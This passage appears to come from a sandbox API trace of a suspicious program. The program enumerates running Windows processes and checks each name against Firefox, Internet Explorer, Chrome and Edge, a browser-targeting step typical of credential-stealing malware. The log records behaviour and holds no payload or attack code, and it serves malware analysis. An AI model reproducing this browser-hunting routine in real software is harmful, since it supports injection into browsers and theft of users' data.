lpString2="iexplore.exe") returned 1 [0248.390] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0248.390] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.390] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.390] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0248.390] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0248.390] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0248.390] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.390] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.391] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0248.391] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0248.391] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0248.391] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.391] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.391] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0248.391] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0248.391] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0248.391] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.391] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.392] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0248.392] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0248.392] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0248.392] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.392] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0248.392] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0248.392] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0248.392] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0248.392] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.392] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.393] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.393] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.393] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.393] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.393] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.394] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.394] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.394] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.395] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.395] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.395] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.396] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0248.396] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0248.396] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0248.396] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.396] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.397] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.397] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.397] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.398] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0248.398] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0248.398] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0248.398] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.398] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.398] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0248.398] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0248.398] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0248.398] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.398] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.399] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0248.399] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0248.399] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0248.399] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.399] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.399] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0248.399] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0248.399] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0248.399] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.399] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.400] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0248.400] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0248.400] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0248.400] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.400] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0248.400] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0248.400] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0248.400] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0248.401] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.401] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0248.401] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0248.401] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0248.401] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0248.401] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.401] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0248.402] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0248.402] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0248.402] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0248.402] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.402] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0248.402] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0248.402] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0248.402] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0248.402] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.402] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0248.403] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0248.403] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0248.403] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0248.403] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.403] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0248.403] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0248.403] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0248.403] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0248.403] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.403] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0248.404] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0248.404] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0248.404] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0248.404] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.404] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0248.405] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0248.405] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0248.405] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0248.405] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0248.405] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0248.405] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0248.405] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0248.405] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0248.406] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0248.406] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0248.406] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0248.406] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0248.406] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0248.406] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0248.406] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0248.406] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0248.407] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0248.407] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0248.407] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0248.407] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0248.407] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0248.407] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0248.407] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0248.407] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.407] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0248.408] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0248.408] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0248.408] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0248.408] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.408] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0248.409] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0248.409] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0248.409] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0248.409] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0248.409] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0248.409] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0248.409] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0248.409] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.409] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0248.410] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0248.410] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0248.410] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0248.410] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0248.410] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0248.410] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0248.410] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0248.410] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.410] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0248.411] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0248.411] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0248.411] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0248.411] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.411] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0248.411] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0248.411] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0248.412] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0248.412] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0248.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0248.412] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0248.412] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0248.412] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0248.412] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.412] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.413] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0248.413] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0248.413] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0248.413] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0248.413] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 